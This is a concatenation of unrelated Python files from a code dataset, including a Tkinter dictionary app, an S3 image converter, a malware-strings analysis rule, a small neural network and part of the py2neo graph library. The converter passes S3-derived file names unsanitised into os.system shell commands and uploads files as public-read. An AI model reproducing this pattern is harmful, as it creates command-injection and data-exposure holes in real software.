problem reading a frame, break gracefully\n except AttributeError:\n break\n\n\n# destroy all windows if we are displaying them\nif display > 0:\n cv2.destroyAllWindows()\n\n# stop the video stream\nvs.stop()\n\n# clean up the graph and device\ngraph.DeallocateGraph()\ndevice.CloseDevice()\n\n","sub_path":"ncs_realtime_mobilenet_my.py","file_name":"ncs_realtime_mobilenet_my.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"631002108","text":"from tkinter import *\r\nfrom PIL import ImageTk,Image\r\nimport pyttsx3\r\nimport speech_recognition as sr\r\nfrom tkinter import messagebox\r\n# initializing the python text to speech\r\nengine= pyttsx3.init()\r\nrate=engine.getProperty(\"rate\")\r\nengine.setProperty(\"rate\",150)\r\n#opening the dictionary data, the jason file\r\n#as it is a json file, we have to import json module inoder to access it\r\nimport json\r\ndata=json.load(open(\"data.json\"))\r\n\r\nwin=Tk()\r\nwin.title(\"Simple Dictionary\")\r\nwin.geometry(\"600x600+400+80\")\r\nwin.iconbitmap(\"dicticon.ico\")\r\n# add image to the window\\\r\nmyimg=ImageTk.PhotoImage(Image.open(\"binocular.png\"))\r\nmyimglabel=Label(image=myimg)\r\nmyimglabel.place(x=170,y=70)\r\ndef findword(word):\r\n \r\n\r\n win2=Tk()\r\n win2.title(\"Output\")\r\n win2.geometry(\"700x700+400+80\")\r\n win2.iconbitmap(\"dicticon.ico\")\r\n\r\n\r\n try:\r\n meaning=data[word]\r\n display1=Label(win2,text=\"Output:\",font=(\"arial\",15,\"bold\"),bg=\"white\",fg=\"black\")\r\n display1.pack() \r\n for i in meaning:\r\n display=Label(win2,text=i,font=(\"arial\",10,\"bold\"),bg=\"white\",fg=\"black\")\r\n display.pack() \r\n #speaking what the meaning is\r\n #engine.say(meaning) \r\n #engine.runAndWait()\r\n #speaking what the meaning is\r\n engine.say(meaning) \r\n engine.runAndWait()\r\n except:\r\n display2=Label(win2,text=\"ERROR!\",font=(\"arial\",20,\"bold\"),bg=\"white\",fg=\"black\")\r\n display2.pack() \r\n display=Label(win2,text=\"Unable to find the meaning of the word:(\",font=(\"arial\",10,\"bold\"),bg=\"white\",fg=\"black\")\r\n display.pack()\r\n engine.say(\"Unable to find the meaning of the word, Please check whether you have given the correct spelling, If this is a flop in the program, please sent us mail to aforprog@gmail.com\")\r\n engine.runAndWait()\r\n display1=Label(win2,text=\"Please check whether you have given a valid word!\",font=(\"arial\",10,\"bold\"),bg=\"white\",fg=\"black\")\r\n display1.pack()\r\n win2.mainloop()\r\n#function before findword\r\ndef getfunction():\r\n getword=word.get().strip()\r\n word.delete(0,END)\r\n findword(getword)\r\n\r\n\r\n#heading\r\nheading=Label(win,text=\"Wanna test me? Give me some word.I will tell you the meaning in no time!\",font=(\"arial\",10,\"bold\"))\r\nheading.place(x=50,y=30)\r\n#space for entering the word\r\nword=Entry(win,textvar=StringVar())\r\nword.place(x=200,y=300)\r\n#search button\r\nsbutton=Button(win,text=\"Search\",font=(\"arial\",10,\"bold\"),fg=\"white\",bg=\"grey\",command=getfunction)\r\nsbutton.place(x=330,y=295)\r\n\r\n#developed by\r\ndby=Label(win,text=\"Developed by:Anandhu S\",font=(\"arial\",13,\"bold\"))\r\ndby.place(x=390,y=520)\r\ndby1=Label(win,text=\"As the project is under development stage, if a situation arises where you entered a valid word\\n and it is showing ERROR!, then please mail us with the word to:\\n aforprogramming@gmail.com\")\r\ndby1.place(x=10,y=550)\r\n\r\n#function for the speech recognition to take place\r\ndef speech():\r\n r=sr.Recognizer()\r\n\r\n with sr.Microphone() as source:\r\n r.adjust_for_ambient_noise(source)\r\n\r\n audio=r.listen(source)\r\n\r\n try:\r\n findword(r.recognize_google(audio))\r\n except:\r\n messagebox.showerror(\"There was some error in the part of voice recognition.\")\r\n\r\n\r\nspeech=Button(win,text=\"Use voice assistant\",fg=\"white\",bg=\"grey\",command=speech)\r\nspeech.place(x=240,y=350)\r\n\r\nwin.mainloop()\r\n","sub_path":"version1.2/dicttk1.2.py","file_name":"dicttk1.2.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"617626237","text":"import os\nimport re\nimport sys\nimport boto3\nfrom PIL import Image\n\ndef extract_img_data(img_full_name):\n\t#EXTRACTS IMAGE WIDTH AND HEIGHT\n # print(imgname)\n imgname = img_full_name.split('.')[0]\n # print(imgname)\n width_start = [m.end(0) for m in re.finditer('_w_', imgname)][0]\n width_end = [m.start(0) for m in re.finditer('_h_', imgname)][0]\n height_start = [m.end(0) for m in re.finditer('_h_', imgname)][0]\n # print(width_start, width_end, height_start)\n width = (int)(imgname[width_start:width_end])\n height = (int)(imgname[height_start:])\n size = (width, height)\n return size\n print(size)\n\ndef save_image(img_full_name, extension, main_path , size):\n\t#CONVERTS IMAGE FROM EMF/WMF TO PDF TO JPG\n\tos.system(\"libreoffice --headless --convert-to pdf \" + main_path + img_full_name + \" --outdir \" + main_path)\n\timg_full_name = img_full_name.split('.')[0]\n\tos.system(\"convert -density 150 \" + main_path + img_full_name + \".pdf \"\n\t + \"-quality 100 \" + main_path + img_full_name + \".jpg\")\n\timg=Image.open(main_path + img_full_name + '.jpg')\n\t# print(img.size)\n\tw=img.size[0]\n\th=img.size[1]\n\tw_size = size[0]\n\th_size = size[1]\n\tw_start = w/2-w_size\n\th_start = h/2-h_size\n\tarea=(w_start, h_start, w_start+2*w_size, h_start+2*h_size)\n\timg = img.crop(area)\n\timg_name = img_full_name[0:[m.start(0) for m in re.finditer('_w_', img_full_name)][0]] + '.jpg'\n\timg.save(main_path + img_name)\n\treturn img_name\n\ns3_client = boto3.client('s3')\nfrom_bucket = os.environ.get('FROM_BUCKET')\nto_bucket = os.environ.get('TO_BUCKET')\nkey = os.environ.get('OBJECT_KEY')\nprefix = os.environ.get('BUCKET_PATH_PREFIX')\n\n# from_bucket = \"testforimage2\"\n# to_bucket = \"testforimage2\"\n# key = \"raw/uploads/qimages/41717/image11_w_33_h_24.wmf\"\n# prefix = \"raw/\"\n# print(from_bucket, to_bucket, key, prefix)\n\n\nimg_full_name = os.path.basename(key)\nextension = img_full_name[img_full_name.find('.'):]\n# main_path = '/mnt/D/CS/Pariksha/WordProcessing/docker_word/docker_ubuntu/downloads/'\nmain_path = '/root/scripts/convert_image/downloads/'\ndownload_path = main_path + img_full_name\n# print(key)\n# print(download_path)\n\ntry:\n\ts3_client.download_file(from_bucket, key, download_path)\n\tsize = extract_img_data(img_full_name)\n\timg_name = save_image(img_full_name, extension, main_path, size)\n\tupload_path = main_path\t + img_name\n\tupload_key = key[key.find(prefix)+len(prefix):key.find(\"_w_\")] + '.jpg'\n\ts3_client.upload_file(upload_path, to_bucket, upload_key.lower(), ExtraArgs={'ACL':'public-read'})\n\ts3_client.delete_object(Bucket=from_bucket, Key=key)\n\nexcept Exception as e:\n print('Error! Code: {c}, Message, {m}'.format(c = type(e).__name__, m = str(e)))\n\n","sub_path":"emf_conv.py","file_name":"emf_conv.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"80861260","text":"from lib.rules import Rules\nfrom lib.parser import Parser\nimport time\n\nclass Cmd(Rules):\n \"\"\"\n This class is used to extract linux command line from malware\n binaries strings. It also inherit the Rules object used to gather\n all shared functions and variables.\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n Initialize type and info_msg attributes which respectively represent\n the type of extracted information (here command line - cmd), and\n the message to display when the rule is initialized.\n \"\"\"\n\n Rules.__init__(self)\n self.type = \"cmd\"\n self.info_msg = \"-> Cmd analysis \"\n\n def run_analysis(self, string_list):\n \"\"\"\n This method is used by the core to run analyze and extract strings\n matching with the \"command line\" type.\n\n :param string_list: All strings to analyse.\n :type string_list: List\n :return: A list of string without strings previously matched.\n :rtype: List\n \"\"\"\n epur_string_list = []\n\n self.bar.init(string_list, self.info_msg + \"is running\")\n for string in string_list:\n cmd_found = Parser.getCmd(string)\n if cmd_found != None:\n self.db.createEntry(string, cmd_found, self.type)\n else:\n epur_string_list.append(string)\n self.bar.update()\n self.bar.close(self.info_msg + \"is complete\", True)\n return epur_string_list\n","sub_path":"utils/malwareStringsAnalyzer/lib/allRules/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"521372637","text":"import math\n\ndef two_sum_to(my_list, total):\n for item in my_list:\n remainder = total - item\n if remainder > 0:\n list_copy = my_list.copy()\n list_copy.remove(item)\n if remainder in list_copy:\n return (item, remainder)\n return None\n\ndef three_sum_to(my_list, total):\n # for i in my_list:\n # for j in my_list:\n # for k in my_list:\n # if i != j and j != k and i + j + k == total:\n # return (i, j, k)\n # return None\n for item in my_list:\n my_list.remove(item)\n remainder = total - item\n \n if remainder > 0:\n result = two_sum_to(my_list, total - item)\n if result is not None:\n return (item, result[0], result[1])\n return None\n\nif __name__ == '__main__':\n test_result = two_sum_to([1721, 979, 366, 299, 675, 1456], 2020)\n # assert test_result == (1721, 299) or test_result == (299, 1721)\n print(test_result)\n \n with open('input.txt', 'r') as f:\n expenses = [int(n.strip()) for n in f.readlines()]\n result = two_sum_to(expenses, 2020)\n\n if result is not None:\n print('{} * {} = {}'.format(result[0], result[1], result[0] * result[1]))\n else:\n print('Result not found')\n\n result = three_sum_to(expenses, 2020)\n\n if result is not None:\n print('{} * {} * {} = {}'.format(result[0], result[1], result[2], result[0] * result[1] * result[2]))\n else:\n print('Result not found')","sub_path":"2020/day/1/report_repair.py","file_name":"report_repair.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563026056","text":"\"\"\"registration date to Doctors\n\nRevision ID: 3bf2ebc70e9\nRevises: b38b44024c\nCreate Date: 2015-06-18 22:47:35.364496\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '3bf2ebc70e9'\ndown_revision = 'b38b44024c'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('doctors', sa.Column('registration_date', sa.DateTime(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('doctors', 'registration_date')\n ### end Alembic commands ###\n","sub_path":"server/doctor/db/alembic/versions/3bf2ebc70e9_registration_date_to_doctors.py","file_name":"3bf2ebc70e9_registration_date_to_doctors.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"483084264","text":"import time\nfrom plyer import notification\nfrom notifyme.messages_dict import dict_message\nimport random\n\nif __name__ == \"__main__\":\n message_choice = random.randint(0, 17)\n while True:\n notification.notify(\n app_name=\"Water-Notifier\",\n title=\"Please drink Water\",\n message=dict_message[message_choice],\n timeout=10\n )\n time.sleep(60*60)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"270016016","text":"#coding: utf-8\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef sample_distribution(p):\n if random.uniform(0, 1) < p:\n return '0'\n else:\n return '1'\n\n\ndef binary2decimal(key):\n decimal = 0\n for k in range(len(key)):\n decimal += int(key[k]) * (2 ** (len(key) - k - 1))\n return decimal\n\n\ndef calculate_weight(decimal, alpha, z):\n return (alpha ** abs(z - decimal)) * (1 - alpha)/(1 + alpha)\n\n\ndef sample_data(dic, p, n, alpha, z):\n binary = ''\n for j in range(n):\n sub_key = sample_distribution(p)\n binary += sub_key\n decimal = binary2decimal(binary)\n weight = calculate_weight(decimal, alpha, z)\n\n if binary in dic:\n dic[binary] += weight\n else:\n dic[binary] = weight\n return dic\n\n\ndef compute_target(dic, i, sum_all, sum_sub):\n for k in dic:\n sum_all += dic[k]\n if k[i] == '1':\n sum_sub += dic[k]\n return float(sum_sub)/sum_all\n\n\nif __name__ == '__main__':\n N = 10\n ALPHA = 0.2\n Z = 128\n sample_amount = 200\n P = 0.5\n\n sum_all = 0\n sum_sub = [0 for _ in range(11)]\n dic = {}\n x = np.arange(1, sample_amount + 1)\n result2 = []\n result4 = []\n result6 = []\n result8 = []\n result10 = []\n\n for k in range(0, sample_amount):\n sample_data(dic, P, N, ALPHA, Z)\n #print(compute_target(dic, 2, sum_all, sum_sub))\n result2.append(compute_target(dic, N - 2, sum_all, sum_sub[2]))\n result4.append(compute_target(dic, N - 4, sum_all, sum_sub[4]))\n result6.append(compute_target(dic, N - 6, sum_all, sum_sub[6]))\n result8.append(compute_target(dic, N - 8, sum_all, sum_sub[8]))\n result10.append(compute_target(dic, N - 10, sum_all, sum_sub[10]))\n\n plt.figure(1)\n\n plt.plot(x, result2)\n plt.plot(x, result4)\n plt.plot(x, result6)\n plt.plot(x, result8)\n plt.plot(x, result10)\n\n print(result2[-1])\n print(result4[-1])\n print(result6[-1])\n print(result8[-1])\n print(result10[-1])\n\n plt.show()\n\n\n","sub_path":"CSE250A/cse250a-hw3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488781365","text":"import email_list\nimport smtplib, logger\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\n\n\nclass Email(object):\n def __init__(self, pwwd, stock, txt):\n self.stock = stock\n self.toaddr = email_list.email # enter email for to addr\n self.txt = txt\n self.pwwd = pwwd\n\n def send(self):\n fromaddr = email_list.email # enter your email\n msg = MIMEMultipart()\n msg['Subject'] = \"Stock \" + str(self.stock)\n msg['From'] = fromaddr\n msg['To'] = self.toaddr\n\n body = self.txt + str(self.stock)\n msg.attach(MIMEText(body, 'plain'))\n\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n try:\n server.login(fromaddr, self.pwwd)\n except EnvironmentError as e:\n logger.log(e)\n text = msg.as_string()\n server.sendmail(fromaddr, self.toaddr, text)\n server.quit()\n","sub_path":"stock_email.py","file_name":"stock_email.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"479378814","text":"import numpy as np\nimport sys\nclass NeuralNetwork:\n def __init__(self, sizes, activation=\"relu\"):\n \"\"\"The list ``sizes`` contains the number of neurons in the respective\n layers of the network. For example, if the list was [2, 3, 1]\n then it would be a three-layer network, with the first layer\n containing 2 neurons, the second layer 3 neurons, and the\n third layer 1 neuron.\n\n ``activation`` is for the hidden layers, it must be a sting, either \"sigmoid\" or \"tanh\" or \"relu\" or \"leaky_relu\"\n \"\"\"\n if not (activation == \"sigmoid\" or activation == \"tanh\" or activation == \"relu\" or activation == \"leaky_relu\"):\n sys.exit('Ooops! activation function must be \"sigmoid\" or \"tanh\" or \"relu\" or \"leaky_relu\"')\n elif (type(sizes) != list):\n sys.exit('Ooops! sized must be a list')\n \n self.num_layers = len(sizes)\n self.sizes = sizes\n self.activation = activation\n self.initialize_weights()\n \n def initialize_weights(self):\n \"\"\" Initlize our weights and biases with numbers drawn from a normal distribution \n with mean=0 and std=1 \n \"\"\"\n self.weights = [np.random.normal(0, 1, (outputSize, inputSize)) for outputSize, inputSize in zip(self.sizes[1:], self.sizes[:-1])]\n self.biases = [np.random.normal(0, 1, (outputSize, 1)) for outputSize in self.sizes[1:]]\n \n def SGD(self, training_data, lr=0.01, epochs=1):\n \"\"\" stochastic gradient descent - update weights at every step in batch \n ``training_data`` is a list of tuples ``(x, y)`` representing the training inputs \n and the desired outputs.\n ``epochs`` = number of iterations we want to go through the training data\n ``lr`` = learning rate, how fast our neural network learns the cost function gradient\n \"\"\"\n self.total_costs = []\n if type(training_data) != list: training_data = list(training_data)\n for epoch in range(epochs):\n self.epoch_costs = []\n for x, y in training_data:\n nablaWs, nablaBs = self.backprop(x, y)\n self.weights = [w-(lr*nw) for w,nw in zip(self.weights,nablaWs)]\n self.biases = [b - (lr * nb) for b, nb in zip(self.biases, nablaBs)]\n self.total_costs.append([epoch+1, (sum(self.epoch_costs)/len(self.epoch_costs))[0][0]])\n \n def feedforward(self, inputs):\n \"\"\"Return the outputs of the network if ``a`` is input\n Don't use activation function on last layer\n \"\"\"\n outputs = []\n for a in inputs:\n a = np.array([a]).reshape((self.sizes[0],1))\n for idx, (w, b) in enumerate(zip(self.weights, self.biases)):\n if idx == (len(self.weights) - 1):\n a = np.matmul(w, a) + b\n else:\n a = self.activation_fn(np.matmul(w, a) + b)\n outputs.append(a)\n return outputs\n \n def backprop(self, x, y):\n \"\"\" reshape inputs and labels \"\"\"\n x = np.array([x]).reshape((self.sizes[0], 1))\n y = np.array([y]).reshape((self.sizes[-1], 1))\n\n \"\"\" arrays to store weights and biases derivatives \"\"\"\n nablaWs = [np.zeros(w.shape) for w in self.weights]\n nablaBs = [np.zeros(b.shape) for b in self.biases]\n\n \"\"\" arrays to store outputs of each layer \"\"\"\n zLayers = [x] \n aLayers = [x]\n \n \"\"\" feedforward with input x, store outputs, z, and activations of z of each layer \"\"\"\n for w, b in zip(self.weights, self.biases):\n z = np.matmul(w, aLayers[-1]) + b\n zLayers.append(z)\n if (len(zLayers) == self.num_layers):\n a = z\n else:\n a = self.activation_fn(z)\n aLayers.append(a)\n \n \"\"\" Append cost of step to self.costs so we can plot our costs later \"\"\"\n self.epoch_costs.append(self.cost_fn(aLayers[-1], y))\n\n \"\"\" Begin Backpropagation\n get d of cost w.r.t final layer, δᴸ = ∇ₐC ⊙ σ′(zᴸ) \n Multiply cost_prime * 1 because σ′(zᴸ) is linear so it equals 1\n \"\"\"\n delta = self.cost_fn_prime(aLayers[-1], y) * 1\n \n \"\"\" backpropagate error to each layer in nn, store each d of cost w.r.t weight layer as nabla_w\n δˡ = ((wˡ⁺¹)ᵀδˡ⁺¹) ⊙ σ′(zˡ).\n ∇w = δˡ(aˡ-¹)ᵀ\n ∇b = δˡ\n \"\"\" \n for l in range(1, self.num_layers):\n nablaWs[-l] = np.dot(delta, aLayers[-l - 1].transpose())\n nablaBs[-l] = delta\n delta = np.dot(self.weights[-l].transpose(),delta) * self.activation_fn_prime(zLayers[-l-1])\n\n return nablaWs, nablaBs\n \n def activation_fn(self, z):\n if self.activation == \"sigmoid\":\n return 1.0 / (1.0+ np.exp(-z))\n elif self.activation == \"tanh\":\n return np.tanh(z)\n elif self.activation == \"relu\":\n return np.maximum(0, z)\n elif self.activation == \"leaky_relu\":\n return np.maximum(0.01 * z, z)\n \n def activation_fn_prime(self, z):\n if self.activation == \"sigmoid\":\n return self.activation_fn(z) * (1 - self.activation_fn(z))\n elif self.activation == \"tanh\":\n return (1 - (np.tanh(z)** 2))\n elif self.activation == \"relu\":\n z[z <= 0] = 0\n z[z > 0] = 1\n return z\n elif self.activation == \"leaky_relu\":\n z[z <= 0] = 0.01\n z[z > 0] = 1\n return z\n \n def cost_fn(self, a, y):\n return 0.5 * ((y - a)** 2)\n \n def cost_fn_prime(self, a, y):\n return (a - y)\n\n ","sub_path":"ApproximatingSine/ApproxSine/neuralnetwork_ex3.py","file_name":"neuralnetwork_ex3.py","file_ext":"py","file_size_in_byte":5795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331097848","text":"import numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nmatrix = np.loadtxt('data.txt', delimiter='\\t', skiprows=1)\r\n\r\ncnt = 1\r\n\r\nfor j in range(1, 10, 1):\r\n for k in range(j+1, 11, 1):\r\n x1 = np.array([])\r\n y1 = np.array([])\r\n x2 = np.array([])\r\n y2 = np.array([])\r\n\r\n for i in range(0, 999, 1):\r\n if matrix[i][0] == 1.:\r\n x1 = np.append(x1, matrix[i][j])\r\n y1 = np.append(y1, matrix[i][k])\r\n else:\r\n x2 = np.append(x2, matrix[i][j])\r\n y2 = np.append(y2, matrix[i][k])\r\n\r\n plt.scatter(x1, y1, color=\"red\")\r\n plt.scatter(x2, y2, color=\"blue\")\r\n\r\n plt.title('Feature-' + str(j) + ' vs ' + 'Feature-' + str(k))\r\n plt.xlabel('Feature-' + str(j))\r\n plt.ylabel('Feature-' + str(k))\r\n plt.legend(['Label 1', 'Label 2'])\r\n plt.savefig('outputs/plot '+str(j)+' '+str(k)+'.png')\r\n\r\n plt.clf()\r\n print('Done '+str(cnt))\r\n cnt = cnt + 1\r\n","sub_path":"Phase 3 - 2020 (Summer)/Week 1 (Mar 28 - Apr 4)/Shreya Goel_190102072/PlotFeatures.py","file_name":"PlotFeatures.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639253490","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n# Copyright 2011-2015, Nigel Small\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom io import StringIO\nfrom warnings import warn\nimport webbrowser\n\nfrom py2neo.compat import integer, string, ustr, xstr\nfrom py2neo.env import NEO4J_AUTH, NEO4J_URI\nfrom py2neo.http import authenticate, Resource, ResourceTemplate\nfrom py2neo.packages.httpstream.packages.urimagic import URI\nfrom py2neo.primitive import \\\n Node as PrimitiveNode, \\\n Relationship as PrimitiveRelationship, \\\n Path as PrimitivePath, \\\n coerce_property\nfrom py2neo.status import BindError, GraphError\nfrom py2neo.util import is_collection, round_robin, version_tuple, \\\n ThreadLocalWeakValueDictionary, deprecated\n\n\n__all__ = [\"DBMS\",\n \"Graph\",\n \"Entity\",\n \"Node\",\n \"Relationship\",\n \"Path\",\n \"graphy\",\n \"node\",\n \"relationship\"]\n\n\nclass DBMS(object):\n \"\"\" Wrapper for the base REST resource exposed by a running Neo4j\n server, corresponding to the ``/`` URI. If no URI is supplied to\n the constructor, a value is taken from the ``NEO4J_URI`` environment\n variable (if set) otherwise a default of ``http://localhost:7474/``\n is used.\n \"\"\"\n\n __instances = {}\n\n __authentication = None\n __graph = None\n\n def __new__(cls, uri=None):\n if uri is None:\n uri = NEO4J_URI\n uri = ustr(uri)\n if not uri.endswith(\"/\"):\n uri += \"/\"\n try:\n inst = cls.__instances[uri]\n except KeyError:\n if NEO4J_AUTH:\n user_name, password = NEO4J_AUTH.partition(\":\")[0::2]\n authenticate(URI(uri).host_port, user_name, password)\n inst = super(DBMS, cls).__new__(cls)\n inst.__resource = Resource(uri)\n inst.__graph = None\n cls.__instances[uri] = inst\n return inst\n\n def __repr__(self):\n return \"\" % self.uri.string\n\n def __eq__(self, other):\n try:\n return self.uri == other.uri\n except AttributeError:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __hash__(self):\n return hash(self.uri)\n\n @property\n def graph(self):\n \"\"\" The graph exposed by this service.\n\n :rtype: :class:`.Graph`\n \"\"\"\n if self.__graph is None:\n # The graph URI used to be determined via\n # discovery but another HTTP call sometimes\n # caused problems in the middle of other\n # operations (such as hydration) when using\n # concurrent code. Therefore, the URI is now\n # constructed manually.\n self.__graph = Graph(self.uri.string + \"db/data/\")\n return self.__graph\n\n @property\n def resource(self):\n \"\"\" The contained resource object for this instance.\n\n :rtype: :class:`py2neo.Resource`\n \"\"\"\n return self.__resource\n\n @property\n def uri(self):\n \"\"\" The full URI of the contained resource.\n \"\"\"\n return self.resource.uri\n\n\nclass Graph(object):\n \"\"\" The `Graph` class provides a wrapper around the\n `REST API `_ exposed\n by a running Neo4j database server and is identified by the base URI of\n the graph database. If no URI is specified, a default value is taken from\n the ``NEO4J_URI`` environment variable. If this is not set, a default of\n `http://localhost:7474/db/data/` is assumed. Therefore, the simplest way\n to connect to a running service is to use::\n\n >>> from py2neo import Graph\n >>> graph = Graph()\n\n An explicitly specified graph database URI can also be passed to the\n constructor as a string::\n\n >>> other_graph = Graph(\"http://camelot:1138/db/data/\")\n\n If the database server requires authorisation, the credentials can also\n be specified within the URI::\n\n >>> secure_graph = Graph(\"http://arthur:excalibur@camelot:1138/db/data/\")\n\n Once obtained, the `Graph` instance provides direct or indirect access\n to most of the functionality available within py2neo.\n\n \"\"\"\n\n __instances = {}\n\n __cypher = None\n __schema = None\n __node_labels = None\n __relationship_types = None\n\n def __new__(cls, uri=None):\n if uri is None:\n uri = DBMS().graph.uri.string\n if not uri.endswith(\"/\"):\n uri += \"/\"\n key = (cls, uri)\n try:\n inst = cls.__instances[key]\n except KeyError:\n inst = super(Graph, cls).__new__(cls)\n inst.resource = Resource(uri)\n cls.__instances[key] = inst\n return inst\n\n def __repr__(self):\n return \"\" % self.uri.string\n\n def __hash__(self):\n return hash(self.uri)\n\n def __len__(self):\n return self.size()\n\n def __bool__(self):\n return True\n\n def __nonzero__(self):\n return True\n\n def __contains__(self, entity):\n return entity.bound and entity.uri.string.startswith(entity.uri.string)\n\n @property\n def cypher(self):\n \"\"\" The Cypher execution resource for this graph providing access to\n all Cypher functionality for the underlying database, both simple\n and transactional.\n\n ::\n\n >>> from py2neo import Graph\n >>> graph = Graph()\n >>> graph.cypher.run(\"CREATE (a:Person {name:{N}})\", {\"N\": \"Alice\"})\n\n :rtype: :class:`py2neo.cypher.CypherEngine`\n\n \"\"\"\n if self.__cypher is None:\n from py2neo.cypher import CypherEngine\n metadata = self.resource.metadata\n self.__cypher = CypherEngine(metadata.get(\"transaction\"))\n return self.__cypher\n\n def create(self, g):\n \"\"\" Create one or more remote nodes, relationships or paths in a\n single transaction. The entity values provided must be either\n existing entity objects (such as nodes or relationships) or values\n that can be cast to them.\n\n For example, to create a remote node from a local :class:`Node` object::\n\n from py2neo import Graph, Node\n graph = Graph()\n alice = Node(\"Person\", name=\"Alice\")\n graph.create(alice)\n\n Then, create a second node and a relationship connecting both nodes::\n\n german, speaks = graph.create({\"name\": \"German\"}, (alice, \"SPEAKS\", 0))\n\n This second example shows how :class:`dict` and :class:`tuple` objects\n can also be used to create nodes and relationships respectively. The\n zero value in the relationship tuple references the zeroth item created\n within that transaction, i.e. the \"German\" node.\n\n .. note::\n If an object is passed to this method that is already bound to\n a remote entity, that argument will be ignored and nothing will\n be created.\n\n :arg entities: One or more existing graph entities or values that\n can be cast to entities.\n :return: A tuple of all entities created (or ignored) of the same\n length and order as the arguments passed in.\n\n \"\"\"\n # TODO update examples in docstring\n self.cypher.create(g)\n\n def create_unique(self, t):\n \"\"\" Create one or more unique paths or relationships in a single\n transaction. This is similar to :meth:`create` but uses a Cypher\n `CREATE UNIQUE `_\n clause to ensure that only relationships that do not already exist are created.\n \"\"\"\n # TODO update examples in docstring\n self.cypher.create_unique(t)\n\n @property\n def dbms(self):\n return self.resource.dbms\n\n def delete(self, g):\n \"\"\" Delete one or more nodes, relationships and/or paths.\n \"\"\"\n self.cypher.delete(g)\n\n def delete_all(self):\n \"\"\" Delete all nodes and relationships from the graph.\n\n .. warning::\n This method will permanently remove **all** nodes and relationships\n from the graph and cannot be undone.\n \"\"\"\n self.cypher.run(\"MATCH (a) OPTIONAL MATCH (a)-[r]->() DELETE r, a\")\n\n def detach(self, g):\n \"\"\" Delete one or more relationships.\n \"\"\"\n self.cypher.detach(g)\n\n def exists(self, *entities):\n \"\"\" Determine whether a number of graph entities all exist within the database.\n \"\"\"\n tx = self.cypher.begin()\n cursors = []\n for entity in entities:\n try:\n if isinstance(entity, Node):\n cursors.append(tx.run(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN count(a)\", x=entity))\n elif isinstance(entity, Relationship):\n cursors.append(tx.run(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN count(r)\", x=entity))\n elif isinstance(entity, Path):\n for node in entity.nodes():\n cursors.append(tx.run(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN count(a)\", x=node))\n for rel in entity.relationships():\n cursors.append(tx.run(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN count(r)\", x=rel))\n else:\n try:\n nodes = entity.nodes()\n relationships = entity.relationships()\n except AttributeError:\n raise TypeError(\"Object %r is not graphy\" % entity)\n else:\n for node in nodes:\n cursors.append(tx.run(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN count(a)\", x=node))\n for rel in relationships:\n cursors.append(tx.run(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN count(r)\", x=rel))\n except BindError:\n pass\n count = len(tx.statements)\n tx.commit()\n if count == 0:\n return None\n else:\n return sum(cursor.evaluate() for cursor in cursors) == count\n\n def find(self, label, property_key=None, property_value=None, limit=None):\n \"\"\" Iterate through a set of labelled nodes, optionally filtering\n by property key and value\n \"\"\"\n if not label:\n raise ValueError(\"Empty label\")\n from py2neo.cypher import cypher_escape\n if property_key is None:\n statement = \"MATCH (n:%s) RETURN n,labels(n)\" % cypher_escape(label)\n parameters = {}\n else:\n statement = \"MATCH (n:%s {%s:{V}}) RETURN n,labels(n)\" % (\n cypher_escape(label), cypher_escape(property_key))\n parameters = {\"V\": property_value}\n if limit:\n statement += \" LIMIT %s\" % limit\n cursor = self.cypher.run(statement, parameters)\n while cursor.move():\n a = cursor[0]\n 